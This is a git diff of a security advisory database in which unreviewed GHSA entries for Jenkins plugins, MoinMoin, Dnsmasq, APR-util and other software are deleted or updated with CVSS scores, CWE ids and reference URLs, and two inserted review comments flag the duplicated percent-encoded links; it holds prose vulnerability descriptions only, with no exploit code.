diff --git a/advisories/unreviewed/2022/05/GHSA-gpmw-h4wq-4rch/GHSA-gpmw-h4wq-4rch.json b/advisories/unreviewed/2022/05/GHSA-gpmw-h4wq-4rch/GHSA-gpmw-h4wq-4rch.json deleted file mode 100644 index 6a65d881cea34..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-gpmw-h4wq-4rch/GHSA-gpmw-h4wq-4rch.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-gpmw-h4wq-4rch", - "modified": "2023-10-25T18:31:26Z", - "published": "2022-05-24T16:56:45Z", - "aliases": [ - "CVE-2019-10409" - ], - "details": "A missing permission check in Jenkins Project Inheritance Plugin 2.0.0 and earlier allowed attackers with Overall/Read permission to trigger project generation from templates.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10409" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-401" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-09-25T16:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-gvhp-v4m2-3rwf/GHSA-gvhp-v4m2-3rwf.json b/advisories/unreviewed/2022/05/GHSA-gvhp-v4m2-3rwf/GHSA-gvhp-v4m2-3rwf.json deleted file mode 100644 index 5ff80f04a4289..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-gvhp-v4m2-3rwf/GHSA-gvhp-v4m2-3rwf.json +++ /dev/null 
@@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-gvhp-v4m2-3rwf", - "modified": "2022-05-13T01:15:02Z", - "published": "2022-05-13T01:15:02Z", - "aliases": [ - "CVE-2019-10277" - ], - "details": "Jenkins StarTeam Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10277" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1085" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-522" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-gw8g-hh47-q4gw/GHSA-gw8g-hh47-q4gw.json b/advisories/unreviewed/2022/05/GHSA-gw8g-hh47-q4gw/GHSA-gw8g-hh47-q4gw.json deleted file mode 100644 index b7799c719ad04..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-gw8g-hh47-q4gw/GHSA-gw8g-hh47-q4gw.json +++ /dev/null 
@@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-gw8g-hh47-q4gw", - "modified": "2022-05-14T03:45:23Z", - "published": "2022-05-14T03:45:23Z", - "aliases": [ - "CVE-2017-1000389" - ], - "details": "Some URLs provided by Jenkins global-build-stats plugin version 1.4 and earlier returned a JSON response that contained request parameters. These responses had the Content Type: text/html, so could have been interpreted as HTML by clients, resulting in a potential reflected cross-site scripting vulnerability. Additionally, some URLs provided by global-build-stats plugin that modify data did not require POST requests to be sent, resulting in a potential cross-site request forgery vulnerability.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000389" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-10-23/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-01-26T02:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-gwxm-wqpq-w539/GHSA-gwxm-wqpq-w539.json b/advisories/unreviewed/2022/05/GHSA-gwxm-wqpq-w539/GHSA-gwxm-wqpq-w539.json deleted file mode 100644 index 2430300a024c7..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-gwxm-wqpq-w539/GHSA-gwxm-wqpq-w539.json +++ /dev/null 
@@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-gwxm-wqpq-w539", - "modified": "2022-05-14T03:18:40Z", - "published": "2022-05-14T03:18:39Z", - "aliases": [ - "CVE-2018-1000176" - ], - "details": "An exposure of sensitive information vulnerability exists in Jenkins Email Extension Plugin 2.61 and older in src/main/resources/hudson/plugins/emailext/ExtendedEmailPublisher/global.groovy and ExtendedEmailPublisherDescriptor.java that allows attackers with control of a Jenkins administrator's web browser (e.g. malicious extension) to retrieve the configured SMTP password.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000176" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-04-16/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-05-08T15:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-gxh5-r8gp-pjc3/GHSA-gxh5-r8gp-pjc3.json b/advisories/unreviewed/2022/05/GHSA-gxh5-r8gp-pjc3/GHSA-gxh5-r8gp-pjc3.json deleted file mode 100644 index 7bf80785c4214..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-gxh5-r8gp-pjc3/GHSA-gxh5-r8gp-pjc3.json +++ /dev/null 
@@ -1,83 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-gxh5-r8gp-pjc3", - "modified": "2022-05-17T05:49:23Z", - "published": "2022-05-17T05:49:23Z", - "aliases": [ - "CVE-2010-2970" - ], - "details": "Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin 1.9.x before 1.9.3 allow remote attackers to inject arbitrary web script or HTML via crafted content, related to (1) action/SlideShow.py, (2) action/anywikidraw.py, and (3) action/language_setup.py, a similar issue to CVE-2010-2487.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2970" - }, - { - "type": "WEB", - "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=584809" - }, - { - "type": "WEB", - "url": "http://hg.moinmo.in/moin/1.9/raw-file/1.9.3/docs/CHANGES" - }, - { - "type": "WEB", - "url": "http://hg.moinmo.in/moin/1.9/rev/4fe9951788cb" - }, - { - "type": "WEB", - "url": "http://hg.moinmo.in/moin/1.9/rev/e50b087c4572" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=127799369406968&w=2" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=127809682420259&w=2" - }, - { - "type": "WEB", - "url": "http://moinmo.in/MoinMoinBugs/1.9.2UnescapedInputForThemeAddMsg" - }, - { - "type": "WEB", - "url": "http://moinmo.in/MoinMoinRelease1.9" - }, - { - "type": "WEB", - "url": "http://moinmo.in/SecurityFixes" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/40836" - }, - { - "type": "WEB", - "url": "http://www.debian.org/security/2010/dsa-2083" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/40549" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2010/1981" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-08-05T13:22:00Z" - } -} \ No newline at end of file 
diff --git a/advisories/unreviewed/2022/05/GHSA-gxmr-w5mj-v8hh/GHSA-gxmr-w5mj-v8hh.json b/advisories/unreviewed/2022/05/GHSA-gxmr-w5mj-v8hh/GHSA-gxmr-w5mj-v8hh.json index 0dc65dceaebbf..086129844332d 100644 --- a/advisories/unreviewed/2022/05/GHSA-gxmr-w5mj-v8hh/GHSA-gxmr-w5mj-v8hh.json +++ b/advisories/unreviewed/2022/05/GHSA-gxmr-w5mj-v8hh/GHSA-gxmr-w5mj-v8hh.json 
@@ -105,34 +105,78 @@ "type": "WEB", "url": "https://kubernetes.io/blog/2019/02/11/runc-and-cve-2019-5736/" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/24e54e3c6b2259e3903b6b8fe26896ac649c481ea99c5739468c92a3%40%3Cdev.dlab.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/24e54e3c6b2259e3903b6b8fe26896ac649c481ea99c5739468c92a3@%3Cdev.dlab.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/a258757af84c5074dc7bf932622020fd4f60cef65a84290380386706%40%3Cuser.mesos.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a258757af84c5074dc7bf932622020fd4f60cef65a84290380386706@%3Cuser.mesos.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/a585f64d14c31ab393b90c5f17e41d9765a1a17eec63856ce750af46%40%3Cdev.dlab.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a585f64d14c31ab393b90c5f17e41d9765a1a17eec63856ce750af46@%3Cdev.dlab.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/acacf018c12636e41667e94ac0a1e9244e887eef2debdd474640aa6e%40%3Cdev.dlab.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/acacf018c12636e41667e94ac0a1e9244e887eef2debdd474640aa6e@%3Cdev.dlab.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/b162dd624dc088cd634292f0402282a1d1d0ce853baeae8205bc033c%40%3Cdev.mesos.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b162dd624dc088cd634292f0402282a1d1d0ce853baeae8205bc033c@%3Cdev.mesos.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rc494623986d76593873ce5a40dd69cb3629400d10750d5d7e96b8587%40%3Cdev.dlab.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc494623986d76593873ce5a40dd69cb3629400d10750d5d7e96b8587@%3Cdev.dlab.apache.org%3E" }, + { + "type": "WEB", + "url": 
"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DLC52IOJN6IQJWJ6CUI6AIUP6GVVG2QP/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EGZKRCKI3Y7FMADO2MENMT4TU24QGHFR/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SWFJGIPYAAAMVSWWI3QWYXGA3ZBU2H4W/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V6A4OSFM5GGOWW4ECELV5OHX2XRAUSPH/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLC52IOJN6IQJWJ6CUI6AIUP6GVVG2QP/" @@ -269,6 +313,18 @@ "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2019/10/29/3" }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/31/6" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/01/1" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/02/3" + }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/106976" diff --git a/advisories/unreviewed/2022/05/GHSA-h3r9-mx35-pp5w/GHSA-h3r9-mx35-pp5w.json b/advisories/unreviewed/2022/05/GHSA-h3r9-mx35-pp5w/GHSA-h3r9-mx35-pp5w.json index 7fe545accde86..99bafa5dae519 100644 --- a/advisories/unreviewed/2022/05/GHSA-h3r9-mx35-pp5w/GHSA-h3r9-mx35-pp5w.json +++ b/advisories/unreviewed/2022/05/GHSA-h3r9-mx35-pp5w/GHSA-h3r9-mx35-pp5w.json 
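Review bot: Every added `lists.apache.org` and `lists.fedoraproject.org` reference in this hunk is a byte-variant of an entry that is already in the array, differing only in `%40` versus a literal `@` in the path, so the list now carries each link twice. Consumers that de-duplicate by exact string (and the advisory UI) will render doubled references, and the divergence between the two spellings also makes future reconciliation with NVD harder. Pick one canonical encoding for the mailing-list URLs and keep a single entry per thread, e.g. retain only `"url": "https://lists.apache.org/thread.html/24e54e3c6b2259e3903b6b8fe26896ac649c481ea99c5739468c92a3@%3Cdev.dlab.apache.org%3E"` and drop its `%40` twin, or normalise on import by percent-decoding before comparing. The second hunk appends three `oss-security/2024/...` posts with no accompanying `modified`/`details` change; if they relate to a different runc disclosure that only cites this CVE, a note in `details` would help readers understand why 2024 links sit on a 2019 advisory.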
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h3r9-mx35-pp5w", - "modified": "2022-05-01T01:52:44Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-05-01T01:52:44Z", "aliases": [ "CVE-2005-0877" ], "details": "Dnsmasq before 2.21 allows remote attackers to poison the DNS cache via answers to queries that were not made by Dnsmasq.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-h5hm-73hg-frrm/GHSA-h5hm-73hg-frrm.json b/advisories/unreviewed/2022/05/GHSA-h5hm-73hg-frrm/GHSA-h5hm-73hg-frrm.json deleted file mode 100644 index 3d8025b65d28b..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-h5hm-73hg-frrm/GHSA-h5hm-73hg-frrm.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-h5hm-73hg-frrm", - "modified": "2022-05-14T02:56:39Z", - "published": "2022-05-14T02:56:39Z", - "aliases": [ - "CVE-2018-1999034" - ], - "details": "A man in the middle vulnerability exists in Jenkins Inedo ProGet Plugin 0.8 and earlier in ProGetApi.java, ProGetConfig.java, ProGetConfiguration.java that allows attackers to impersonate any service that Jenkins connects to.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1999034" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-07-30/#SECURITY-933" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-295" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-08-01T13:29:00Z" - } -} \ No newline at end of file 
diff --git a/advisories/unreviewed/2022/05/GHSA-h699-2469-3vhg/GHSA-h699-2469-3vhg.json b/advisories/unreviewed/2022/05/GHSA-h699-2469-3vhg/GHSA-h699-2469-3vhg.json index 4c428124ef98d..5723363a4cdef 100644 --- a/advisories/unreviewed/2022/05/GHSA-h699-2469-3vhg/GHSA-h699-2469-3vhg.json +++ b/advisories/unreviewed/2022/05/GHSA-h699-2469-3vhg/GHSA-h699-2469-3vhg.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h699-2469-3vhg", - "modified": "2022-05-24T19:09:03Z", + "modified": "2024-01-30T00:30:28Z", "published": "2022-05-24T19:09:03Z", "aliases": [ "CVE-2021-3169" ], "details": "An issue in Jumpserver 2.6.2 and below allows attackers to create a connection token through an API which does not have access control and use it to access sensitive assets.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/05/GHSA-h7hj-mf8m-2h22/GHSA-h7hj-mf8m-2h22.json b/advisories/unreviewed/2022/05/GHSA-h7hj-mf8m-2h22/GHSA-h7hj-mf8m-2h22.json index b5327836785ba..89819f2537722 100644 --- a/advisories/unreviewed/2022/05/GHSA-h7hj-mf8m-2h22/GHSA-h7hj-mf8m-2h22.json +++ b/advisories/unreviewed/2022/05/GHSA-h7hj-mf8m-2h22/GHSA-h7hj-mf8m-2h22.json @@ -38,6 +38,14 @@ "type": "WEB", "url": "http://www.eset.com/joomla/index.php?option=com_content&task=view&id=3469&Itemid=26" }, + { + "type": "WEB", + "url": "http://www.nruns.com/%5Bn.runs-SA-2007.016%5D%20-%20NOD32%20Antivirus%20CAB%20parsing%20Arbitrary%20Code%20Execution%20Advisory.pdf" + }, + { + "type": "WEB", + "url": "http://www.nruns.com/%5Bn.runs-SA-2007.016%5D%20-%20NOD32%20Antivirus%20CAB%20parsing%20Arbitrary%20Code%20Execution%20Advisory.txt" + }, { "type": "WEB", "url": "http://www.nruns.com/[n.runs-SA-2007.016]%20-%20NOD32%20Antivirus%20CAB%20parsing%20Arbitrary%20Code%20Execution%20Advisory.pdf" 
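Review bot: The two `nruns.com` references added to GHSA-h7hj-mf8m-2h22 are percent-encoded copies (`%5B` / `%5D`) of the `[n.runs-SA-2007.016]` URLs that already follow them, so the same advisory PDF and TXT are now listed twice each. A reference array should hold one entry per distinct resource; since the bracket form is the one the vendor site serves, keep e.g. `"url": "http://www.nruns.com/[n.runs-SA-2007.016]%20-%20NOD32%20Antivirus%20CAB%20parsing%20Arbitrary%20Code%20Execution%20Advisory.pdf"` and drop the `%5B...%5D` duplicates, or normalise both to a single encoding before they are merged in. The `modified` timestamp for this file is not visible in the hunk, so confirm it was bumped alongside the CWE change in the following hunk.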
@@ -61,7 +69,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-362" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-h7rx-r733-7x7r/GHSA-h7rx-r733-7x7r.json b/advisories/unreviewed/2022/05/GHSA-h7rx-r733-7x7r/GHSA-h7rx-r733-7x7r.json deleted file mode 100644 index f4bd727d926f0..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-h7rx-r733-7x7r/GHSA-h7rx-r733-7x7r.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-h7rx-r733-7x7r", - "modified": "2022-05-13T01:40:57Z", - "published": "2022-05-13T01:40:57Z", - "aliases": [ - "CVE-2017-1000107" - ], - "details": "Script Security Plugin did not apply sandboxing restrictions to constructor invocations via positional arguments list, super constructor invocations, method references, and type coercion expressions. This could be used to invoke arbitrary constructors and methods, bypassing sandbox protection.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000107" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-08-07/" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-05T01:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-hf4p-4j9r-3cvx/GHSA-hf4p-4j9r-3cvx.json b/advisories/unreviewed/2022/05/GHSA-hf4p-4j9r-3cvx/GHSA-hf4p-4j9r-3cvx.json deleted file mode 100644 index 51a2899e58140..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-hf4p-4j9r-3cvx/GHSA-hf4p-4j9r-3cvx.json +++ /dev/null 
@@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-hf4p-4j9r-3cvx", - "modified": "2022-05-24T22:00:36Z", - "published": "2022-05-24T22:00:36Z", - "aliases": [ - "CVE-2019-16355" - ], - "summary": "Incorrect Default Permissions in Beego", - "details": "The File Session Manager in Beego 1.10.0 allows local users to read session files because of weak permissions for individual files.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16355" - }, - { - "type": "WEB", - "url": "https://github.com/beego/beego/issues/3763" - }, - { - "type": "WEB", - "url": "https://github.com/beego/beego/pull/3975/commits/f99cbe0fa40936f2f8dd28e70620c559b6e5e2fd" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-276" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-09-16T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-hfr6-pxvf-frf7/GHSA-hfr6-pxvf-frf7.json b/advisories/unreviewed/2022/05/GHSA-hfr6-pxvf-frf7/GHSA-hfr6-pxvf-frf7.json index 09f313081dcc3..c20a339a26fce 100644 --- a/advisories/unreviewed/2022/05/GHSA-hfr6-pxvf-frf7/GHSA-hfr6-pxvf-frf7.json +++ b/advisories/unreviewed/2022/05/GHSA-hfr6-pxvf-frf7/GHSA-hfr6-pxvf-frf7.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hfr6-pxvf-frf7", - "modified": "2022-05-02T03:30:19Z", + "modified": "2024-02-02T15:30:27Z", "published": "2022-05-02T03:30:19Z", "aliases": [ "CVE-2009-1955" ], "details": "The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ 
@@ -18,58 +21,114 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-1955" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/f7f95ac1cd9895db2714fa3ebaa0b94d0c6df360f742a40951384a53%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f7f95ac1cd9895db2714fa3ebaa0b94d0c6df360f742a40951384a53@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r2295080a257bad27ea68ca0af12fc715577f9e84801eae116a33107e%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2295080a257bad27ea68ca0af12fc715577f9e84801eae116a33107e@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r476d175be0aaf4a17680ef98c5153b4d336eaef76fb2224cc94c463a%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r476d175be0aaf4a17680ef98c5153b4d336eaef76fb2224cc94c463a@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r57608dc51b79102f3952ae06f54d5277b649c86d6533dcd6a7d201f7%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r57608dc51b79102f3952ae06f54d5277b649c86d6533dcd6a7d201f7@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r75cbe9ea3e2114e4271bbeca7aff96117b50c1b6eb7c4772b0337c1f%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75cbe9ea3e2114e4271bbeca7aff96117b50c1b6eb7c4772b0337c1f@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": 
"https://lists.apache.org/thread.html/r9ea3538f229874c80a10af473856a81fbf5f694cd7f471cc679ba70b%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9ea3538f229874c80a10af473856a81fbf5f694cd7f471cc679ba70b@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rad01d817195e6cc871cb1d73b207ca326379a20a6e7f30febaf56d24%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rad01d817195e6cc871cb1d73b207ca326379a20a6e7f30febaf56d24@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rc4c53a0d57b2771ecd4b965010580db355e38137c8711311ee1073a8%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc4c53a0d57b2771ecd4b965010580db355e38137c8711311ee1073a8@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rdca61ae990660bacb682295f2a09d34612b7bb5f457577fe17f4d064%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdca61ae990660bacb682295f2a09d34612b7bb5f457577fe17f4d064@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/reb7c64aeea604bf948467d9d1cab8ff23fa7d002be1964bcc275aae7%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reb7c64aeea604bf948467d9d1cab8ff23fa7d002be1964bcc275aae7@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9%40%3Ccvs.httpd.apache.org%3E" + 
}, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rfbaf647d52c1cb843e726a0933f156366a806cead84fbd430951591b%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfbaf647d52c1cb843e726a0933f156366a806cead84fbd430951591b@%3Ccvs.httpd.apache.org%3E" @@ -261,7 +320,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-776" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-hg77-2mmh-2xqw/GHSA-hg77-2mmh-2xqw.json b/advisories/unreviewed/2022/05/GHSA-hg77-2mmh-2xqw/GHSA-hg77-2mmh-2xqw.json index b37e597e5af17..b1d83f246abcc 100644 --- a/advisories/unreviewed/2022/05/GHSA-hg77-2mmh-2xqw/GHSA-hg77-2mmh-2xqw.json +++ b/advisories/unreviewed/2022/05/GHSA-hg77-2mmh-2xqw/GHSA-hg77-2mmh-2xqw.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hg77-2mmh-2xqw", - "modified": "2022-05-02T03:45:58Z", + "modified": "2024-02-08T21:30:31Z", "published": "2022-05-02T03:45:58Z", "aliases": [ "CVE-2009-3520" ], "details": "Cross-site request forgery (CSRF) vulnerability in the Your_account module in CMSphp 0.21 allows remote attackers to hijack the authentication of administrators for requests that change an 